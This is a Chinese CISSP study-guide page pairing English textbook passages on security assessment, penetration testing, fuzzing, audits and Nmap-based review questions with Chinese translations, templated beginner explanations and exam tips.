自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 51 / PDF P1079

第 1079 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

information security program. They are complemented by formal internal and external audits performed by third parties on a less frequent basis. Exam Essentials Understand the importance of security assessment and testing programs. Security assessment and testing programs provide an important mechanism for validating the ongoing effectiveness of security controls. They include a variety of tools, such as vulnerability assessments, penetration tests, software testing, audits, and security management tasks designed to validate controls. Every organization should have a security assessment and testing program defined and operational. Conduct vulnerability assessments and penetration tests.

Vulnerability assessments use automated tools to search for known vulnerabilities in systems, applications, and networks. These flaws may include missing patches, misconfigurations, or faulty code that exposes the organization to security risks. Penetration tests also use these same tools but supplement them with attack techniques where an assessor attempts to exploit vulnerabilities and gain access to the system. Vulnerability management programs take the results of these tests as inputs and then implement a risk management process for identified vulnerabilities. Perform software testing to validate code moving into production.

Software testing techniques verify that code functions as designed and does not contain security flaws. Code review uses a peer review process to formally or informally validate code before deploying it in production. Interface testing assesses the interactions between components and users with API testing, user interface testing, and physical interface testing. Understand the difference between static and dynamic software testing. Static software testing techniques, such as code reviews, evaluate the security of software without running it by analyzing either the source code or the compiled application.

Dynamic testing evaluates the security of software in a runtime environment and is often the only option for organizations deploying applications written by someone else. Explain the concept of fuzzing. Fuzzing uses modified inputs to test software performance under unexpected circumstances. Mutation fuzzing modifies known inputs to generate synthetic inputs that may trigger

中文直译 / 整理

信息安全计划。 它们由第三方定期进行的正式内部和外部审计作为补充。 考试要点 理解安全评估与测试计划的重要性。 安全评估与测试计划为验证安全控制措施 的持续有效性提供了重要机制。 它们包括多种工具,如漏洞评估、渗透测试、 软件测试、审计以及旨在验证控制措施的安全管理任务。 每个组织都应制定并 实施安全评估与测试计划。 执行漏洞评估和渗透测试。 漏洞评估使用自动化工具来搜索系统、应用程序和网络中的已知漏洞。 这些缺 陷可能包括缺少补丁、配置错误或导致组织面临安全风险的故障代码。 渗透测 试同样使用这些工具,但会辅以攻击技术,评估人员尝试利用漏洞并获取系统 访问权限。 漏洞管理计划将这些测试的结果作为输入,然后对已识别的漏洞实 施风险管理流程。 执行软件测试以验证即将投入 生产环境的代码。 软件测试技术验证代码是否按设计运行且不包含安全缺陷。 代码审查通过同行评审流程,在部署到生产环境前正式或非正式地验证代码。 接口测试评估组件与用户之间的交互,包括API测试、用户界面测试和物理接口 测试。 理解静态软件测试与动态软件测试之间的区别。

静态软件测试技术,例如代码 审查,通过分析源代码或编译后的应用程序,在不运行软件的情况下评估其安 全性。 动态测试则在运行时环境中评估软件的安全性,对于部署由他人编写的 应用程序的组织而言,这通常是唯一的选择。 解释模糊测试的概念。 模糊测试通过修改输入来测试软件在意外情况下的性 能。 变异模糊测试修改已知输入以生成可能触发

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1079 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 52 / PDF P1080

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

unexpected behavior. Generational fuzzing develops inputs based on models of expected inputs to perform the same task. Perform security management tasks to provide oversight to the information security program. Security managers must perform a variety of activities to retain proper oversight of the information security program. Log reviews, particularly for administrator activities, ensure that systems are not misused. Account management reviews ensure that only authorized users retain access to information systems. Backup verification ensures that the organization's data protection process is functioning properly.

Management should also monitor other security functions, such as disaster recovery, business continuity, and awareness/training programs. Key performance and risk indicators provide a high-level view of security program effectiveness. Conduct or facilitate internal, external, and third-party audits. Security audits occur when a third party performs an assessment of the security controls protecting an organization's information assets. Internal audits are performed by an organization's internal staff and are intended for management use. External audits are performed by a third-party audit firm and are generally intended for the organization's governing body.

Collect logs and security process data. Many components of the information security program generate data that is crucial to security assessment processes. These components include the account management process, management review and approval, key performance and risk indicators, backup verification data, training and awareness metrics, and the data generated by disaster recovery and business continuity programs. Know how to use cybersecurity exercises to ensure that teams are prepared for security incidents. Exercises are designed to test the skills of security professionals. Blue teams are responsible for managing the organization's defenses.

Offensive hacking is used by red teams as they attempt to gain access to systems on the target network. White teams serve as the neutral moderators of the exercise. Purple teaming is conducted after an exercise to bring together the red and blue teams for knowledge sharing. Written Lab 1. Describe the difference between TCP SYN scanning and TCP connect scanning.

中文直译 / 整理

异常行为的合成输入。 生成式模糊测试基于预期输入的模型来生成输入以完成相 同任务。 执行安全管理任务,以对信息安全计划进行监督。 安全管理人员必须执行各种 y 活动以保留 prop监督 g信息安全计划。 日志审查,特别是针对管理员活动,可确保系统不被滥用。 账 户管理审查可确保只有授权用户保留对信息系统的访问权限。 备份验证可确 保组织的数据保护流程正常运行 。 管理层还应监控其他安全功能,例如灾难恢复、业务连续性和意识/培训计划。 关键绩效和风险指标为信息安全计划的有效性提供了高层次的视图。 开展或促进内部、外部和第三方审计。 安全审计是指第三方对保护组织信息 资产的安全控制进行评估。 内部审计由组织内部人员执行,旨在供管理层使 用。 外部审计由第三方审计公司执行,通常旨在供组织的治理机构使用。 收集日志和安全流程数据。 信息安全计划的许多组件都会生成对安全评估过程 至关重要的数据。 这些组件包括账户管理流程、管理审查与批准、关键绩效与 风险指标、备份验证数据、培训与意识指标,以及灾难恢复和业务连续性计划 生成的数据。 了解如何利用网络安全演练确保团队为安全事件做好准备。 演练旨在测试安全专 业人员的技能。

蓝队负责管理组织的防御措施。 红队使用进攻性黑客技术试图访 问目标网络上的系统。 白队作为演练的中立 moderator。 紫队演练在演练结束后 进行,旨在将红队和蓝队召集在一起进行知识共享。 实验题 1. 描述TCP SYN扫描与TCP连接扫描之间的区别。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

审计题关注独立性、证据、范围和报告。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 53 / PDF P1081

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

2. What are the five port status values returned by the Nmap network discovery scanning tool? 3. What is the difference between static and dynamic code testing techniques? 4. What is the difference between mutation fuzzing and generational fuzzing? Review Questions 1. Which one of the following tools is used primarily to perform network discovery scans? A. Nmap B. Nessus C. Metasploit D. lsof 2. Adam recently ran a network port scan of a web server running in his organization. He ran the scan from an external network to get an attacker's perspective on the scan. Which one of the following results is the greatest cause for alarm? A. 80/open B. 22/filtered C. 443/open D. 1433/open 3.

Which one of the following factors should not be taken into consideration when planning a security testing schedule for a particular system? A. Sensitivity of the information stored on the system B. Difficulty of performing the test C. Desire to experiment with new testing tools D. Desirability of the system to attackers 2. Nmap

中文直译 / 整理

网络发现扫描工具返回的五个端口状态值是什么? 3. 静态代码测试技术和动态代码测试技术有何区别? 4. 变异模糊测试和生成式模糊测试有何区别? 复习题 1. 以下哪种工具主要用于执行网络发现扫描? A. Nmap B. Nessus C. Metasploit D. lsof 2. 亚当最近对其组织内运行的Web服务器进行了网络端口扫描。 他从外部 网络执行扫描,以模拟攻击者的视角。 以下哪一项结果最令人担忧? A. 80/open B. 22/过滤 C. 443/open D. 1433/open 3. 在为特定系统规划安全测试计划时,以下哪个因素不应被考虑? not A. 系统上存储信息的敏感性 B. 执行测试的难度 C. 尝试使用新测试工具的意愿 D. 系统对攻击者的吸引力

小白解释

场景先行:你是公司的安全负责人,正在读第 1081 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 54 / PDF P1082

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

4. Which one of the following is not normally included in a security assessment? A. Vulnerability scan B. Risk assessment C. Mitigation of vulnerabilities D. Threat assessment 5. Who is the intended audience for a security assessment report? A. Management B. Security auditor C. Security professional D. Customers 6. Wendy is considering the use of a vulnerability scanner in her organization. What is the proper role of a vulnerability scanner? A. They actively scan for intrusion attempts. B. They serve as a form of enticement. C. They locate known security holes. D. They automatically reconfigure a system to a more secured state. 7.

Alan ran an Nmap scan against a server and determined that port 80 is open on the server. What tool would likely provide him the best additional information about the server's purpose and the identity of the server's operator? A. SSH B. Web browser C. Telnet D. Ping 8. What port is typically used to accept administrative connections using the SSH utility? A. 20 B. 22 4.

中文直译 / 整理

以下哪一项通常不包含在安全评估中? A. 漏洞扫描 B. 风险评估 C. 漏洞缓解 D. 威胁评估 5. 安全评估报告的目标受众是谁? A. 管理 B. 安全审计员 C. 安全专业人员 D. 客户 6. 温迪正在考虑在她的组织中使用漏洞扫描器。 漏洞扫描器的正确角 色是什么? A. 它们主动扫描入侵尝试。 B. 它们作为一种诱饵形式。 C. 它们定位已知的安全漏洞。 D. 它们自动将系统重新配置为更安全的状态。 7. 艾伦对一台服务器进行了Nmap扫描,并确定服务器的80端口是开放的。 什么工具最有可能为他提供有关服务器用途和服务器操作员身份的额外信息? A. SSH B. 网络浏览器 C. Telnet D. Ping 8. 通常使用哪个端口通过SSH工具接受管理连接? A. 20 B. 22

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
漏洞扫描 漏洞扫描用工具找已知弱点。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 55 / PDF P1083

第 1083 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

C. 25 D. 80 9. Which one of the following tests provides the most accurate and detailed information about the security state of a server? A. Unauthenticated scan B. Port scan C. Half-open scan D. Authenticated scan 10. What type of network discovery scan only uses the first two steps of the TCP handshake? A. TCP connect scan B. Xmas scan C. TCP SYN scan D. TCP ACK scan 11. Matthew would like to test systems on his network for SQL injection vulnerabilities. Which one of the following tools would be best suited to this task? A. Port scanner B. Network vulnerability scanner C. Network discovery scanner D. Web vulnerability scanner 12.

Tina is searching for potential gaps in her organization's incident response plan and gathers the team together for an exercise. They do not use any actual IT systems (production or test) in their work but simply discuss how they would respond to a scenario. What term best describes this test? A. Red team exercise B. Blue team exercise C. Tabletop exercise D. Purple team exercise C. 25 D. 80 9.

中文直译 / 整理

以下哪项测试能提供有关服务器安全状态最准确和详细的信息? A. 未认证扫描 B. 端口扫描 C. 半开扫描 D. 认证扫描 10. 哪种类型的网络发现扫描仅使用TCP三次握手的前两个步骤? A. TCP连接扫描 B. Xmas扫描 C. TCP SYN扫描 D. TCP ACK扫描 11. Matthew希望测试其网络中的系统是否存在SQL注入漏洞。 以下哪种工 具最适合完成此任务? A. 端口扫描器 B. 网络漏洞扫描器 C. 网络发现扫描器 D. Web漏洞扫描器 12. 蒂娜正在寻找其组织事件响应计划中的潜在漏洞,并召集团队进行一次演 练。 他们在工作中不使用任何实际的IT系统(生产或测试),而只是讨论如 何应对某种情景。 哪个术语最能描述这种测试? A. 红队演练 B. 蓝队演练 C. 桌面推演 D. 紫队演练

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

漏洞扫描:漏洞扫描用工具找已知弱点。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1083 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

扫描发现弱点,不等于已经成功利用。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
漏洞扫描 漏洞扫描用工具找已知弱点。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 56 / PDF P1084

第 1084 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

13. Grace is performing a penetration test against a client's network and would like to use a tool to assist in automatically executing common exploits. Which one of the following security tools will best meet her needs? A. Nmap B. Metasploit C. Nessus D. Nikto 14. Paul would like to test his application against slightly modified versions of previously used input. What type of test does Paul intend to perform? A. Code review B. Application vulnerability review C. Mutation fuzzing D. Generational fuzzing 15. Users of a banking application may try to withdraw funds that don't exist from their account. Developers are aware of this threat and implemented code to protect against it.

What type of software testing would most likely catch this type of vulnerability if the developers have not already remediated it? A. Misuse case testing B. SQL injection testing C. Fuzzing D. Code review 16. What type of interface testing would identify flaws in a program's command-line interface? A. Application programming interface testing B. User interface testing C. Physical interface testing D. Security interface testing 17. During what type of penetration test does the tester always have access to system configuration information? 13.

中文直译 / 整理

格蕾丝正在对客户的网络执行渗透测试,并希望使用一种工具来辅助自动执 行常见的 利用。 以下哪种安全工具最能满足她的需求? A. Nmap B. Metasploit C. Nessus D. Nikto 14. 保罗希望使用之前使用过的输入的略微修改版本来测试他的应用程序。 保罗 打算执行什么类型的测试? A. 代码审查 B. 应用程序漏洞审查 C. 变异模糊测试 D. 生成式模糊测试 15. 银行应用程序的用户可能尝试从其账户中提取不存在的资金。 开发人员了 解这一威胁,并已实施代码加以防范。 如果开发人员尚未修复此漏洞,哪种类 型的软件测试最有可能发现此类漏洞? A. 误用案例测试 B. SQL注入测试 C. 模糊测试 D. 代码审查 16. 哪种接口测试能够识别程序命令行接口中的缺陷? A. 应用程序编程接口测试 B. 用户界面测试 C. 物理接口测试 D. 安全接口测试 17. Durin g what t ype of penetration test does the tester always have access to system configuration information?

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1084 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 57 / PDF P1085

第 1085 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A. Black-box penetration test B. White-box penetration test C. Gray-box penetration test D. Red-box penetration test 18. What port is typically open on a system that runs an unencrypted HTTP server? A. 22 B. 80 C. 143 D. 443 19. Robert recently completed a SOC engagement for a customer and is preparing a report that describes his firm's opinion on the suitability and effectiveness of security controls after evaluating them over a six-month period. What type of report is he preparing? A. Type I B. Type II C. Type III D. Type IV 20. What information security management task ensures that the organization's data protection requirements are met effectively? A. Account management B.

Backup verification C. Log review D. Key performance indicators A.

中文直译 / 整理

黑盒渗透测试 B. 白盒渗透测试 C. 灰盒渗透测试 D. 红盒渗透测试 18. 运行未加密的HTTP服务器的系统通常开放哪个端口? A. 22 B. 80 C. 143 D. 443 19. 罗伯特最近为一位客户完成了SOC服务,并正在准备一份报告,描述其公 司在为期六个月的评估后,对安全控制措施的适当性和有效性的意见。 他正 在准备哪种类型的报告? A. I型 B. II型 C. III型 D. IV型 20. 哪项信息安全管理工作能确保组织的数据保护要求得到有效满足? A. 账户管理 B. 备份验证 C. 日志审查 D. 关键绩效指标

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

加密:加密把内容变成未授权者看不懂的形式。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1085 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

渗透测试需要书面授权、范围和规则。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
加密 加密把内容变成未授权者看不懂的形式。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
第 16 章 · P1087-1136 · 50 个学习单元

安全运营管理

OSG10 · Chapter 16 · Managing Security Operations · 全文覆盖 + 小白精读 + 画报

第 16 章:安全运营管理

这不是提炼版。本页按 PDF 第 1087-1136 页连续覆盖第 16 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

50个连续学习单元
4格原文 / 直译 / 解释 / 考点
50页覆盖第16章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1087

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 2.0: Asset Security 2.3 Provision information and assets securely 2.3.1 Information and asset ownership 2.3.2 Asset inventory (e.g., tangible, intangible) 2.3.3 Asset management Domain 3: Security Architecture and Engineering 3.1 Research, implement and manage engineering processes using secure design principles 3.1.2 Least privilege 3.1.6 Segregation of Duties (SoD) 3.5 Assess and mitigate the vulnerabilities of security architectures, designs, and solution elements 3.5.6 Cloud-based systems (e.g., Software as a Service (SaaS), Infrastructure as a Service (IaaS), Platform as a Service (PaaS)) 3.5.11 Serverless Domain 7: Security Operations 7.3 Perform configuration management (CM) (e.g., provisioning, baselining, automation) 7.4 Apply foundational security operations concepts 7.4.1 Need-to-know/least privilege 7.4.2 Segregation of Duties (SoD) and responsibilities 7.4.3 Privileged account management 7.4.4 Job rotation 7.4.5 Service-level agreements (SLA) 7.5 Apply resource protection 7.5.1 Media management

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域 2.0:资产安全 2.3 安全地提供信息和资产 2.3.1 信息和资产所有权 2.3.2 资产清单(例如,有形、无形) 2.3.3 资产管理 领域3:安全架构与工程 3.1 使用安全设计原则研究、实施和管理工程流程 3.1.2 最小权限 3.1.6 职责分离(SoD) 3.5 评估和缓解安全架构、设计及解决方案元素的漏洞 3.5.6 基于云的系统(例如,软件即服务(SaaS)、基础设施 即服务(IaaS)、平台即服务(PaaS)) 3.5.11 无服务器 领域 7:安全运营 7.3 执行配置管理(CM)(例如,供应、基线化、自动化) 7.4 应用基础安全运营概念 7.4.1 按需知晓/最小权限 7.4.2 职责分离(SoD)与责任 7.4.3 特权账户管理 7.4.4 岗位轮换 7.4.5 服务级别协议(SLA) 7.5 应用资源保护 7.5.1 媒体管理

小白解释

场景先行:你是公司的安全负责人,正在读第 1087 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 02 / PDF P1088

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

